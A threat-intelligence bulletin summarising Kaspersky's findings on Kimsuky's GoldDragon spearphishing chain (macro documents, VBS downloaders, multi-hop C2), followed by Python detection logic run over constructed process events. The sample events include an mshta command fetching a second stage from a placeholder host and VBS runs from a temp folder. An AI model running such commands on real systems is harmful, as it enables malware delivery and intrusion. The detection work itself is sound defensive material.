Infectious Spearphishing Emails Linked with Kimsuky's GoldDragon Cluster
Industry: Government - Politicians | Level: Tactical | Source: Kaspersky
Researchers from Kaspersky have identified new cybercrime activity associated with the North Korean threat actor group Kimsuky; a cluster of the group known as GoldDragon is specifically being tracked. Spearphishing emails distributed by the group use themes tied to geopolitical issues within Korea. Each email carries a weaponized Word document with a malicious macro. Once the macro executes, a VBS script is downloaded onto the victim's workstation to collect host information and to download additional scripts/malware that complete the information-stealing campaign. GoldDragon appears to be interested only in specific targets: an email address check validates whether the infection chain should proceed, and benign payloads are supplied to unexpected email addresses. The C2 infrastructure used by the group is complex and contains multiple hops: "The Kimsuky group configured multi-stage command and control servers with various commercial hosting services located around the world."
- Kimsuky's GoldDragon - Infection Chain with Malicious Doc
Anvilogic Use Cases:
- Suspicious Executable by CMD.exe
- MSHTA.exe execution
- Rare Remote Thread
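As an added illustration (not code from the Kaspersky report or from Anvilogic), the following Python runs simple detection logic over constructed process-creation events for the chain summarized above: an Office application spawning cmd.exe or a script host, cmd.exe launching a script host, and mshta.exe pulling remote content. All paths, command lines, the URL and the event field names are constructed assumptions, not observed indicators.

```python
import re

# Constructed sample of Windows process-creation events (Sysmon Event ID 1 style).
# These lines are illustrative only; they are not telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c wscript.exe //e:vbscript C:\Users\u\AppData\Local\Temp\x.txt"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/stage2"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\upd.vbs"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event matches (empty if benign)."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"].lower()
    hits = []
    # Office app spawning a shell or script host: the macro-to-VBS stage
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # cmd.exe launching a script host (cf. "Suspicious Executable by CMD.exe")
    if parent == "cmd.exe" and image in SCRIPT_HOSTS - {"cmd.exe"}:
        hits.append("cmd_spawns_script_host")
    # mshta.exe fetching remote content (cf. "MSHTA.exe execution")
    if image == "mshta.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_content")
    # any script host referencing a user-writable temp path
    if image in SCRIPT_HOSTS and re.search(r"\\appdata\\local\\temp\\", cmd):
        hits.append("script_from_temp")
    return hits


def scan(events):
    """Index and rule hits for every event that matches at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```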